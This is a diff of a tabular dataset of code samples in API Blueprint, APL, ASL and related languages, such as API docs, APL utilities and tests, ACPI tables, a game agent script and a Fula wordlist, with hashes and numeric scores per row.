-"0bdf38c8664746065e61ea74555e55f6b7e92118","generatePDF.apib",".apib","API Blueprint","## Generar documento [/generatePDF] +TBD -### generarDocumento [POST] -+ Request Request +### Sign In [POST] - + Body - { - 'PGRpdiBjbGFzcz0idmF1Y2hlciI+CiAgICA8ZGl2IGNsYXNzPSJib2R5IGNvbXByb2JhbnRlIj4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJpdGVtIHRpdGxlIj4KICAgICAgICAgICAgICAgIDx0YWJsZT4KICAgICAgICAgICAgICAgICAgICA8dHIgY2xhc3M9InRleHQtY2VudGVyIj4KICAgICAgICAgICAgICAgICAgICAgICAgPHRkPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iYWJzb2x1dGUgaW1nLWxvZ28tbXVsdGl2YSI+PC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxoMj5DT01QUk9CQU5URSBERSBWQUxJREFDScOTTgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9oMj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPkJhbmNvIE11bHRpdmEsIFMuQS4sIEluc3RpdHVjacOzbiBkZQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJhbmNhIE3Dumx0aXBsZSwgR3J1cG8gRmluYW5jaWVybyBNdWx0aXZhCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3A+CiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgIC","56","0.9824561403508771","0.0","0.0" -"02c3cf9f20ed854674b0475f0216d0b7321a5270","apiary.apib",".apib","API Blueprint","FORMAT: 1A -HOST: http://polls.apiblueprint.org/ +TBD -# RAPI ++ Response 200 -Polls is a simple API allowing consumers to view polls and vote in them. -# Polls API Root [/] -This resource does not have any attributes. Instead it offers the initial -API affordances in the form of the links in the JSON body. +## Feeds List [/feeds] -It is recommend to follow the “url” link values, -[Link](https://tools.ietf.org/html/rfc5988) or Location headers where -applicable to retrieve resources. Instead of constructing your own URLs, -to keep your client decoupled from implementation details. +The Feeds List resource has the following attributes: -## Retrieve the Entry Point [GET] ++ AMOUNT ++ FEEDS ++ FEED_SITE ++ FEED_TYPE -+ Response 200 (application/json) +Collection of all Feeds. List all feeds on Feeds_Status_Page with following attributes: - { - ""questions_url"": ""/questions"" - } ++ FEED_ID ++ NAME ++ DESCRIPTION ++ SITE ++ FILENAME ++ TYPE ++ LAST_COMPLT_TIME ++ HISTORY ++ STATUS_FLAG + +### List All Feeds [GET] -## Group Question +List all feeds in the database, including active and inactive feeds. -Resources related to questions in the API. ++ Response 200 (application/json) + + { + ""AMOUNT"": 2, + ""FEEDS"": + [ + { + ""FEED_ID"" : 3, + ""NAME"" : ""Shopzilla Daily Home & Garden Unstructured"", + ""DESCRIPTION"" : ""Shopzilla home & garden unstructured feed"", + ","47","0.8703703703703703","0.0","0.0" +"082507e6dc16b055ad06484170ba1c1bf6a485da","apiary.apib",".apib","API Blueprint","FORMAT: 1A +HOST: https://api.lightrail.com/v2/ -## Question [/questions/{question_id}] +# Lightrail Documentation -A Question object has the following attributes: +Welcome to Lightrail. Lightrail makes it easy to create gift cards, manage customer account credit, run promotional discount programs, and collect multi-tender payment in a unified checkout solution. Create an account to generate API keys and begin testing. -+ question -+ published_at - An ISO8601 date when the question was published. -+ url -+ choices - An array of Choice objects. +[Create an account](https://www.lightrail.com/app/#/auth/register) -+ Parameters - + question_id: 1 (required, number)","56","0.9824561403508771","0.0","0.0" -"1e418eaaadcd7cd38a6ab518cafc8c70460a7d95","network.apib",".apib","API Blueprint","# Group Network +## Authentication +Authentication is done via an authorization header. You can retrieve your Lightrail API key [here](https://www.lightrail.com). -All API calls are contextual to the User that is making the request, and all User accounts are associated with the -Network that they are created on. Each network has a unique `application_user_key`. +In requests to Lightrail you must include the following header: +``` +Authorization: Bearer +``` -## Network [/network] +## Dates -+ Attributes (object) - + network_id: 1l1000003 - ID of the network - + network_name: PHG - Name of the network - + network_description: PHG Network - Description of the network - + network_notes: Internal PHG Network - Any additional notes for the network - + network_application_id: 2 - + auto_approve_publishers (YesOrNo) - + default_campaign_id - + cm_client_id: b4d0d85c2cff813cdce092c261b2b200 - + network_contact_email - + network_locale (Locale) +All dates are sent and received in 8601 format. -### List Networks [GET] +```text +YYYY-MM-DDTHH:MM:SSZ +``` -Retrieve the details of the authenticated Network. +## Filtering -+ Response 200 (application/json; charset=utf-8) - + Attributes - + networks (array[Network Wrapper]) -","56","0.9824561403508771","0.0","0.0" -"0e0c2519236f6e940e78c91eae86bf503d9de503","REPSRUN.apl",".apl","APL"," ∇ Z←REPSRUN X;P;M;S;R;O;U;G;H;head;I;J;F;T;W;K;Y;E;B;N;futuregrids;futurepath [1] ⍝Fill out calls with reps for BLOCKRUN, TABLERUN, and WATERSHEDRUN [2] ⍝Arguments ⍵: [3] ⍝ P systems, (block size or table rows), reps file [4] ⍝ M metric name [5] ⍝ S source grids [6] ⍝ E settings table name [7] ⍝ R result grids [8] ⍝ B buffer size [9] ⍝ O override pars [10] ⍝ N include grid [11] ⍝Results: [12] ⍝ Z call [13] ⍝ U result grids [14] ⍝B. Compton, 5 and 14 Mar 2013 [15] ⍝Note: not sure if this will take care of settings variables, though I think so [16] ⍝16 May 2013: work if there are no variables set; I forgot include grid before [17] ⍝10 Apr 2014: make sure _m substitution happens in the end [18] [19] [20] [21] P M S E R B O N ← X [22] G←(⊂,''),1 TABLE 3⊃P ⍝Read reps file [23] H←',' MATRIFY head [24] I←1+H MATIOTA MATRIFY 'input settings results' [25] J←(⍳1↑⍴H)~H MATI","16","0.45714285714285713","0.0","0.0" -"0e1c41730d1abff64b19e55617795f1228e092a3","subd.apl",".apl","APL","3.4 - 1.5 -","16","0.45714285714285713","0.0","0.0" -"13aded8a19d9b4e9a7a5103b79fda622a6d85e3d","create7.apl",".apl","APL","decl - integer status; +Resources that may contain lots of entries ([Contacts](#reference/0/contacts/list-contacts), [Values](#reference/0/values/list-values), [Programs](#reference/0/programs/list-programs), [Transactions](#reference/0/transactions)) have filters","47","0.8703703703703703","0.0","0.0" +"06568ecacf50c28f60a175918a6dc5cefc9bd06a","master64.apl",".apl","APL","decl + integer pid,i,s; enddecl integer main() { - print(""in init ..""); - status = Create(""viva.dat""); - print(status); - print("".. out init""); - return 0; + print (""Before Fork""); + + i=0; + while(i<60) do + pid = Fork(); + if(pid == -2) then + s=Exec(""ex10.xsm""); + endif; + if(pid==-1)then + print(""pid=-1""); + breakpoint; + break; + endif; + i=i+1; + endwhile; +// s=Wait(i+1); + breakpoint; + return 0; } -","16","0.45714285714285713","0.0","0.0" +","12","0.4444444444444444","0.0","0.0" +"1171870c43bbb9d2ab612b450e4dc5da152e20a7","GETCACHEINFO.apl",".apl","APL"," ∇ Z←GETCACHEINFO;D;I;Q;T;D_ [1] ⍝Build full cache directory and return it [2] ⍝Need to get lock and GETCACHECONFIG before calling this [3] ⍝B. Compton, 16 Nov 2017 (from CACHEINFO) [4] [5] [6] [7] D←0 7⍴0 [8] I←0 [9] L1:→(cache[5]2) f else g 28 + +⎕ ← (3>3) f else g 28 + +A ← (2 2 ⍴ ⍳ 4) +⎕ ← (3>2) f else g A + +⎕ ← (3>3) f else g A + +0","12","0.4444444444444444","0.0","0.0" "015df4ee8638f1018f5e1bd19ccd12619f9f8a4a","create.apl",".apl","APL","decl integer status; string file; @@ -1503,160 +1525,71 @@ integer main() status = Create(file); print(status); return 0; -}","16","0.45714285714285713","0.0","0.0" -"207e59ceedcaa8fe4fc8ced8a30141e86edfaba2","ln.apl",".apl","APL","⍟⋆1 -","16","0.45714285714285713","0.0","0.0" -"17202bcadecd25489e779564a88fdf928cc900f0","mix_tests.dyalog",".dyalog","APL",":Namespace mix_tests - -⎕IO ⎕ML ⎕WX←0 1 3 - -X←{⊢#.UT.expect←⍵} ⋄ M←#.mystika - -MIX∆01_TEST←{_←X 16⍪0⍪0⍪(8⍴16)⊤⍳4 ⋄ M.mix 16⍪¨0⍪¨0⍪¨(⊂8⍴16)⊤¨↓⍳4} -MIX∆02_TEST←{_←X 16⍪0⍪0⍪(8⍴16)⊤↑⍳4 4 ⋄ M.mix 16⍪¨0⍪¨0⍪¨(⊂8⍴16)⊤¨⍳4 4} -MIX∆03_TEST←{_←X 16⍪0⍪0⍪(8⍴16)⊤2 2⍴⍳4 ⋄ M.mix 16⍪¨0⍪¨0⍪¨(⊂8⍴16)⊤¨↓2 2⍴⍳4} -MIX∆04_TEST←{_←X 16⍪0⍪0⍪(8⍴16)⊤2 3 4⍴⍳24 ⋄ M.mix 16⍪¨0⍪¨0⍪¨(⊂8⍴16)⊤¨↓2 3 4⍴⍳24} -MIX∆05_TEST←{_←X 16⍪0⍪0⍪(8⍴16)⊤2 3 4 5⍴⍳120 ⋄ M.mix 16⍪¨0⍪¨0⍪¨(⊂8⍴16)⊤¨↓2 3 4 5⍴⍳120} -MIX∆06_TEST←{_←X 16⍪0⍪0⍪(8⍴16)⊤↑(1)(2+⍳5)(2 4⍴7+⍳8) ⋄ M.mix 16⍪¨0⍪¨0⍪¨(⊂8⍴16)⊤¨(1)(2+⍳5)(2 4⍴7+⍳8)} -MIX∆07_TEST←{_←X 16⍪0⍪0⍪(32⍴16)⊤2 3⍴1 ⋄ M.mix (⊂16 0 0),¨2 3⍴¯16 ¯4 ¯8 ¯32 ¯16 ¯8↑¨1} - -:EndNamespace - - - - - -","11","0.3142857142857143","0.0","0.0" -"0069bb42b1e411084cf6cdd42cfaf90ab3ce0b3b","editpage.dyalog",".dyalog","APL",":Class EditPage : MildPage - - :Include #.HTMLInput ⍝ Useful functions for creating HTML pages - - :Field Public FileName←'' ⍝ Name of page to edit - :Field Public Contents←'' ⍝ - :Field Public Message←'' - :Field Public Action←'' ⍝ All action buttons have this name - :Field Private Loaded←'' ⍝ The Loaded File - - ∇ Render req;html;⎕TRAP;z - :Access Public - ⎕TRAP←0 'S' - - DoAction ⍝ If a button was pressed, deal with it - - html←'

Editing File ',Loaded,'

' - html,←'Save As: ',('FileName'Edit FileName),' ',('Action'Submit'Save'),' ',('Action'Submit'Reload') - html,←(0≠⍴Message)/'

',Message,'
' - html,←'
Edit Source: (and click HERE to test after saving)
' - - html,←'Contents'MultiEdit(100 100)Contents'class=apl' ⍝ An ""Edit"" called ""Name"" containing the N","11","0.3142857142857143","0.0","0.0" -"0453ece80c4775b47c82e5a5f0bf12ca3e9da993","TestTelnetServer.dyalog",".dyalog","APL"," TestTelnetServer;cmd2;rc;cmd1;port;host;i;cmds;cmd;prompt;CR - ⍝ Test the Telnet Server - - host port←'localhost' 5023 ⍝ Default port is 23 - ##.TelnetServer.Run&⍬ - ⎕DL 2 ⍝ Give it time to start - - cmds←⍬ - prompt←NL,' ' - CR←1⊃NL - - :For i :In ⍳2 ⍝ Login to two sessions - rc cmd←##.DRC.Clt''host port'Text' 10000 - {}Say cmd''(⊂'User: ') - {}Say cmd('mkrom',CR)(⊂'Password: ') - {}Say cmd('secret',CR)(⊂prompt) - cmds←cmds,⊂cmd - :EndFor - - :For i :In ⍳⍴cmds ⍝ Make the sessions do something - {}Say cmd('2+2',CR)(⊂prompt) - :EndFor - - ##.DRC.Send(1⊃cmds)(')END',CR) - ⎕DL 2 - ##.DRC.Close¨cmds -","11","0.3142857142857143","0.0","0.0" -"21a2cc76aff488eca02dde30d49f17a83d341f66","Strings.dyalog",".dyalog","APL",":Namespace Strings - - ∇ r←lc r;m;upper - lower←'abcdefghijklmnopqrstuvwxyzæøå' - m←r∊upper←⎕A,'ÆØÅ' - (m/r)←lower[upper⍳m/r] - ∇ - - ∇ r←{sep}vtom x;max;len;m - ⍝ Vector to Matrix with optional separator - :If 0=⎕NC'sep' ⋄ sep←' ' ⋄ :EndIf - max←⌈/len←¯1+{(⍵,1+⍴x)-0,⍵}{⍵/⍳⍴⍵}sep=x←,x - r←((0≠⍴x)×⍴m)⍴(,m←len∘.≥⍳max)\,x~sep - ∇ - - ∇ r←dlb x - ⍝ Delete Leading Blanks - r←(+/∧\' '=x)↓x - ∇ - - ∇ r←dtb x - ⍝ Delete Trailing Blanks - r←(-+/∧\' '=⌽x)↓x - ∇ - - ∇ r←deb x - ⍝ Delete extraneous blanks - r←{1↓¯1↓(~' '⍷⍵)/⍵}' ',x,' ' - ∇ - - ∇ r←dmb x;m - ⍝ Delete multiple blanks - r←(m⍲1⌽m←' '=x)/x - ∇ - - ∇ str←str subst(from to);m;⎕IO;i - ⍝ simple string substitution - ⎕IO←0 - :Trap 0 - str←((esc from)⎕R(esc to))str - :Else - →(∨/m←from⍷str)↓0 - i←m⍳1 - str←((i↑str),to,(i+⍴from)↓str)subst(from to) - :EndTrap - ∇ - - esc←{⎕ML","11","0.3142857142857143","0.0","0.0" -"008709f5a7c1b80391ae07cf8e3953027449feca","LessThanOrEqualTo.dyalog",".dyalog","APL"," LessThanOrEqualTo←{ ⍝ ≤ according to TAO and with type as default left arg - ⍺←⊃0⍴⊂⍵ - 1=≡⍺ ⍵:0 1 1[⊃1↓⍋⍺ ⍵ ⍺] - ⍺ ∇¨⍵ - } -","11","0.3142857142857143","0.0","0.0" -"17b00098ad149a26b20b380b576542dd52e88503","superio.asl",".asl","ASL","/* +}","12","0.4444444444444444","0.0","0.0" +"1304a3f841a4c51a135b6d06edefe63f4c78a355","hostbridge.asl",".asl","ASL","/* * This file is part of the coreboot project. * - * Copyright (C) 2012 Google Inc. * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation; version 2 of the License. + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License as + * published by the Free Software Foundation; version 2 of + * the License. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software - * Foundation, Inc. */ -/* mainboard configuration */ -#include +#include + +Name(_HID,EISAID(""PNP0A08"")) // PCIe +Name(_CID,EISAID(""PNP0A03"")) // PCI -#define SIO_EC_MEMMAP_ENABLE // EC Memory Map Resources -#define SIO_EC_HOST_ENABLE // EC Host Interface Resources -#define SIO_EC_ENABLE_PS2K // Enable PS/2 Keyboard -#define SIO_EC_ENABLE_COM1 // Enable Seria","139","0.6096491228070176","0.0","0.0" -"1ed492851a98ac23c252ca3b4577f28749f85090","DECL.asl",".asl","ASL","/* +Name(_BBN, 0) + +Device (MCHC) +{ + Name(_ADR, 0x00000000) // 0:0.0 + + OperationRegion(MCHP, PCI_Config, 0x00, 0x100) + Field (MCHP, DWordAcc, NoLock, Preserve) + { + Offset (0x40), // EPBAR + EPEN, 1, // Enable + , 11, // + EPBR, 20, // EPBAR + + // MCHBAR + MHEN, 1, // Enable + , 13, // + MHBR, 18, // MCHBAR + + // PCIe BAR + PXEN, 1, // Enable + PXSZ, 2, // BAR size + , 23, // + PXBR,","133","0.6785714285714286","0.0","0.0" +"0ebc14e944e79c7563247495c37f3f43ae30de2b","MAIN.asl",".asl","ASL","/* + * Some or all of this work - Copyright (c) 2006 - 2018, Intel Corp. + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without modification, + * are permitted provided that the following conditions are met: + * + * Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * Neither the name of Intel Corporation nor the names of its contributors + * may be used to endorse or promote products derived from this software + * without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ""AS IS"" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS ","133","0.6785714285714286","0.0","0.0" +"01ea1fe7e1320e0093569d4afb2e6e5b3890e4bb","opregions.asl",".asl","ASL","/* * Some or all of this work - Copyright (c) 2006 - 2017, Intel Corp. * All rights reserved. * @@ -1674,7 +1607,7 @@ MIX∆07_TEST←{_←X 16⍪0⍪0⍪(32⍴16)⊤2 3⍴1 ⋄ M.mix (⊂16 0 0),¨ * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ""AS IS"" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS ","139","0.6096491228070176","0.0","0.0" + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS ","133","0.6785714285714286","0.0","0.0" "03eda52c15eb3fdd015fe5595bcdec912c9af861","Ether_One_Load_Remover.asl",".asl","ASL"," state(""UDK"", ""1.00"") { @@ -1720,293 +1653,326 @@ isLoading return false; } } - ","139","0.6096491228070176","0.0","0.0" -"05e9fa29704089c765495c91e3bf414ec645292f","chromeos.asl",".asl","ASL","/* - * This file is part of the coreboot project. - * - * Copyright (C) 2015 Google Inc. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation; version 2 of the License. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - */ + ","133","0.6785714285714286","0.0","0.0" +"0f167f45561904f9c7de3acc39d896bfe75f8b41","terranCommandCenter.asl",".asl","ASL","// Command center (and commander) in SettlersInSpace.mas2j -Name(OIPG, Package() { - Package () { 0x0001, 0, 0xFFFFFFFF, ""PCH-LP"" }, // no recovery button - Package () { 0x0003, 1, 58, ""PCH-LP"" }, // firmware write protect -}) -","139","0.6096491228070176","0.0","0.0" -"03342bd1810fd97a3b8e845594602b63874d0f36","dsdt.asl",".asl","ASL","/* - * This file is part of the coreboot project. - * - * Copyright (C) 2008 Advanced Micro Devices, Inc. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation; version 2 of the License. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - */ +{ include(""rules.asl"") } -/* DefinitionBlock Statement */ -DefinitionBlock ( - ""DSDT.AML"", /* Output filename */ - ""DSDT"", /* Signature */ - 0x02, /* DSDT Revision, needs to be 2 for 64bit */ - ""AMD "", /* OEMID */ - ""COREBOOT"", /* TABLE ID */ - 0x00010001 /* OEM Revision */ - ) -{ /* Start of ASL file */ - /* #include */ /* Include global debug methods if needed */ - - /* Data to be patc","139","0.6096491228070176","0.0","0.0" -"18547afbd30f2762da5c649cc2f1b1e350ff6a0a","matrix.dsl",".dsl","ASL","// generate a combinatorial explosion of the provided variables -// example: - -matrix code { - param letter = tokens( a b c ) - param digit = tokens( 1 2 3 ) - param symbol = tokens( ! @ # ) -} - -// output will be 27 combinations: -// a 1 !, a 1 @, a 1 # -// a 2 !, a 2 @, a 2 # -// a 3 !, a 3 @, a 3 # -// b 1 !, b 1 @, b 1 # -// b 2 !, b 2 @, b 2 # -// b 3 !, b 3 @, b 3 # -// c 1 !, c 1 @, c 1 # -// c 2 !, c 2 @, c 2 # -// c 3 !, c 3 @, c 3 # - -// except sometimes you don't need to test every combination, just each combination of two values -// so I really only need to test ""a 1"", ""1 !"", and ""a !"" one time each -// the matrix will by default automatically try and accomplish this, and give you results more like this: - -// a 1 # -// a 2 @, a 2 # -// a 3 !, a 3 @, a 3 # -// b 1 @, b 1 # -// b 2 ! -// b 3 ! -// c 1 !, c 1 @, c 1 # -// c 2 ! -// c 3 ! - -// a is tested 6 times, instead of 9 times -// b is tested 4 times -// c is tested 5 times -// 1 is tested 6 times -// 2 is tested 4","90","0.39473684210526316","0.0","0.0" -"1483a9f4c8c487d47e87d72769de65499ea2aed1","DerivativeTest1.dsl",".dsl","ASL","model (y) = DerivativeTest1() - - state x = 0 - equation x' = 1 - - output y = (x, x') - - solver=forwardeuler{dt=1} ++!delegateTrain(Unit) : building(Unit, Bld) & link(Bld, Ag) <- .print(""Building "", Unit, "" at "", Ag); .send(Ag, achieve, train(Unit)). -end -","90","0.39473684210526316","0.0","0.0" -"0d4035521b92118571d84ff317a3a90ea67ef755","SSDT-BAT.dsl",".dsl","ASL","/* - * Base for SSDT-BAT was taken from midi1996 with ACPI Hotpatch changes - * - * Source: - * https://github.com/midi1996/X2G2-opencore-hackintosh/blob/master/files/ACPI/SSDT-BAT.aml - * - * BTIF and BTIX method rewrites are written and maintained by Khronokernel - */ -DefinitionBlock ("""", ""SSDT"", 2, ""Khrono"", ""BATTERY"", 0x00000000) -{ - External (_SB_.NBST, PkgObj) - External (_SB_.NBTI, PkgObj) - External (_SB_.NDBS, PkgObj) - External (_SB_.PCI0.LPCB.EC0_, DeviceObj) - External (_SB_.PCI0.LPCB.EC0_.BATN, FieldUnitObj) - External (_SB_.PCI0.LPCB.EC0_.BRCC, FieldUnitObj) - External (_SB_.PCI0.LPCB.EC0_.BRCV, FieldUnitObj) - External (_SB_.PCI0.LPCB.EC0_.BSEL, FieldUnitObj) - External (_SB_.PCI0.LPCB.EC0_.BST_, FieldUnitObj) - External (_SB_.PCI0.LPCB.EC0_.BSTA, MethodObj) // 1 Arguments - External (_SB_.PCI0.LPCB.EC0_.BTDR, MethodObj) // 1 Arguments - External (_SB_.PCI0.LPCB.EC0_.BTMX, MutexObj) - External (_SB_.PCI0.LPCB.EC0_.CRZN, FieldUnitObj) - Exter","90","0.39473684210526316","0.0","0.0" -"1dea7d3b65da9a3dd412906c7bf8549ce57c525c","SSDT-4.dsl",".dsl","ASL","/* - * Intel ACPI Component Architecture - * AML/ASL+ Disassembler version 20180427 (64-bit version)(RM) - * Copyright (c) 2000 - 2018 Intel Corporation - * - * Disassembling to non-symbolic legacy ASL operators - * - * Disassembly of ../origin-rom2/SSDT-4.aml, Sat Oct 5 10:19:54 2019 - * - * Original Table Header: - * Signature ""SSDT"" - * Length 0x000014E2 (5346) - * Revision 0x02 - * Checksum 0xFE - * OEM ID ""DELL\x"" - * OEM Table ID ""TbtTypeC"" - * OEM Revision 0x00000000 (0) - * Compiler ID ""INTL"" - * Compiler Version 0x20160527 (538314023) - */ -DefinitionBlock ("""", ""SSDT"", 2, ""DELL\x"", ""TbtTypeC"", 0x00000000) -{ - External (_SB_.PCI0.RP01.PXSX, DeviceObj) // (from opcode) - External (_SB_.PCI0.RP05.PXSX, DeviceObj) // (from opcode) - External (_SB_.PCI0.RP09.PXSX, DeviceObj) // (from opcode) - External (_SB_.PCI0.RP21.PXSX, DeviceObj) // (from opcode) - External (_SB_.UBTC.RUCC, MethodOb","90","0.39473684210526316","0.0","0.0" -"06e072921a37dcb374821a689c3ec9c39b240a6e","Story.dsl",".dsl","ASL","story(1) -{ - local() - { - @var1(0); - }; - onmessage(""start"") - { - wait(1900); - publishlogicevent(""ge_set_story_state"",""game"",0); - loop(1) - { - createnpc(1001+$$); - }; - wait(5000); - if(@var1 < 1) - { - loop(6) - { - createnpc(1101+$$); - }; - }; - wait(1000); - setblockedshader(0x0000ff90,0.5,0,0xff000090,0.5,0); - }; - onmessage(""allnpckilled"") - { - inc(@var1); - wait(600); - publishlogicevent(""ge_area_clear"", ""game"",0); - wait(1500); - showwall(""AtoB"",false); - wait(100); - restartareamonitor(2); - }; - onmessage(""anyuserenterarea"",2) - { - showwall(""BDoor"",true); - startstory(2); - terminate(); - }; - onmessage(""missionfailed"") - { - changescene(0); - terminate(); - }; -}; -story(2) ++!workersTrained : not gameStart. ++!workersTrained : unit(""Terran SCV"", C) & C < 5 <- !train(""Terran SCV""). ++!workersTrained : unit(""Terran SCV"", C) & C > 4 <- +workersTrained. + +// +!offensiveUnitTrained. ++!defensiveUnitTrained : U = ""Terran Marine"" & unit(""Terran Marine"", N) & N < 4 <- !delegateTrain(U); !defensiveUnitTrained. ++!defensiveUnitTrained : U = ""Terran Vulture"" & unit(""Terran Vulture"", N) & N < 2 <- !delegateTrain(U); !defensiveUnitTrained. ++!defensiveUnitTrained : unit(""Terran Marine"", M) & M >= 4 & unit(""Terran Vulture"", T) & T >= 2 <- +defensiveUnitTrained. ++!defensiveUnitTrained <- .wait(500); !defensiveUnitTrained. + ++!enemyLocated : not(delegated) & not(friendly(_,""Terran Vulture"",_)) <- +delegated; !!delegateTrain(""Terran Vulture""); !enemyLocated. ++!","133","0.6785714285714286","0.0","0.0" +"093b9a7f21f7b1b7c1766a837642dce33c8ba2f2","ff-wordlist_wiki-wordlist.dsl",".dsl","ASL","#NAME ""ff-wordlist Wiki Wordlist"" +#INDEX_LANGUAGE ""Fula"" +#CONTENTS_LANGUAGE ""Fula"" + +Afirik + [m1]Afirik[/m] + +Norwees + [m1]Norwees[/m] + +Irlannda + [m1]Irlannda[/m] + +Hunngariya + [m1]Hunngariya[/m] + +Hispaanya + [m1]Hispaanya[/m] + +Dowlaaji Dentuɗi + [m1]Dowlaaji Dentuɗi[/m] + +Beljik + [m1]Beljik[/m] + +Luksammbuur + [m1]Luksammbuur[/m] + +Suwed + [m1]Suwed[/m] + +Poloonya + [m1]Poloonya[/m] + +Lituwaniya + [m1]Lituwaniya[/m] + +Italiya + [m1]Italiya[/m] + +Suwis + [m1]Suwis[/m] + +Portokeesi + [m1]Portokeesi[/m] + +Yuroopu + [m1]Yuroopu[/m] + +Aasiya + [m1]Aasiya[/m] + +Wikipeediya + [m1]Wikipeediya[/m] + +Holannda + [m1]Holannda[/m] + +Kenya + [m1]Kenya[/m] + +Gana + [m1]Gana[/m] + +Faransi + [m1]Faransi[/m] + +Esperanto + [m1]Esperanto[/m] + +Faransinkoore + [m1]Faransinkoore[/m] + +Roosiya + [m1]Roosiya[/m] + +Almaanya + [m1]Almaanya[/m] + +Belaruusiya + [m1]Belaruusiya[/m] + +Almankoore + [m1]Almankoore[/m] + +Islannda + [m1]Islannda[/m] + +Estoniya + [m1]Estoniya[/m] + +Go’o + [m1]Go’o[/m] + +Ɗiɗi + [m1]Ɗiɗi[/m] + +Tati + [m1]Tati[/m] + +Nayi + [m1]Nayi[/m] + +Jowi + [m","87","0.44387755102040816","0.0","0.0" +"18c36969af6edaa63ec1576db742d773d7380acf","DSDT.dsl",".dsl","ASL","/* + * Intel ACPI Component Architecture + * AML/ASL+ Disassembler version 20150930-64 + * Copyright (c) 2000 - 2015 Intel Corporation + * + * Disassembling to non-symbolic legacy ASL operators + * + * Disassembly of DSDT.aml, Fri Oct 23 18:40:38 2015 + * + * Original Table Header: + * Signature ""DSDT"" + * Length 0x0001A05F (106591) + * Revision 0x02 + * Checksum 0x23 + * OEM ID ""_ASUS_"" + * OEM Table ID ""Notebook"" + * OEM Revision 0x01072009 (17244169) + * Compiler ID ""INTL"" + * Compiler Version 0x20120913 (538052883) + */ +DefinitionBlock (""DSDT.aml"", ""DSDT"", 2, ""_ASUS_"", ""Notebook"", 0x01072009) { - local() - { - @var1(0); - }; - onmessage(""start"") - { - wait(100); - loop(5) - { - createnpc(2001+$$); - }; - wait(5000); - if(@var1 < 1) - { - loop(6) - { - createnpc(2101+$$); - }; - }; - wait(1000); - setblockedshader(0x0000ff90,0.5,0,0xff000090,0.5,0); - }; - onmessage(""allnpckilled"") - { - inc(","90","0.39473684210526316","0.0","0.0" -"03e1eafeea1b37370710b9b82555fd20096ce210","metalengmsggenasn.asn",".asn","ASN.1","0‚ú ClassnameMessagesAliasMessages0k ClassnameMessageAliasm1TextDNº Error: %C. Existe una cadena de caracteres detrás del último END.0j ClassnameMessageAliasm2TextCNº Error: %C. Existe más de un espacio en blanco después del BEGIN.0€ ClassnameMessageAliasm3TextYNº Error: %C. Existe más de un espacio en blanco después de la declaración del objeto %O.0r ClassnameMessageAliasm4TextKNº Error: %C. El objeto %O tiene en el alias un espacio en blanco o \\ o /.0` ClassnameMessageAliasm5Text9Nº Error: %C. El objeto %O no puede ser contenido por %A.0Q ClassnameMessageAliasm6Text*Nº Error: %C. El objeto %O no tiene alias.0Q ClassnameMessageAliasm7Text*Nº Error: %C. El objeto %O no es correcto.0y ClassnameMessageAliasm8TextRNº Error: %C. Existe más de un espacio en blanco o el objeto no ha sido declarado.0T ClassnameMessageAliasm9Text-Nº Error: %C. El objeto no ha sido declarado.0o ClassnameMessag","60","0.759493670886076","0.0","0.0" -"13bef14ed74f03994f7f52ec7122b6a3c7e6ce63","Internode-definitions.asn",".asn","ASN.1","-- 3GPP TS 25.331 V11.7.0 (2013-09) --- $Id: Internode-definitions.asn 52202 2013-09-24 17:56:17Z pascal $ --- -Internode-definitions DEFINITIONS AUTOMATIC TAGS ::= + /* + * iASL Warning: There were 32 external control methods found during + * disassembly, but only 24 were resolved (8 unresolved). Additional + * ACPI tables may be required to properly disassemble the code. This + * resulting disassembler output file may not compile because the + * disassembler did","87","0.44387755102040816","0.0","0.0" +"0b57cb202e06cea6fd61a9ff48f7631ca173b118","SSDT-7-SaSsdt.dsl",".dsl","ASL","/* + * Intel ACPI Component Architecture + * AML/ASL+ Disassembler version 20160422-64(RM) + * Copyright (c) 2000 - 2016 Intel Corporation + * + * Disassembling to non-symbolic legacy ASL operators + * + * Disassembly of SSDT-7-SaSsdt.aml, Sun Jan 20 19:49:27 2019 + * + * Original Table Header: + * Signature ""SSDT"" + * Length 0x00006B80 (27520) + * Revision 0x02 + * 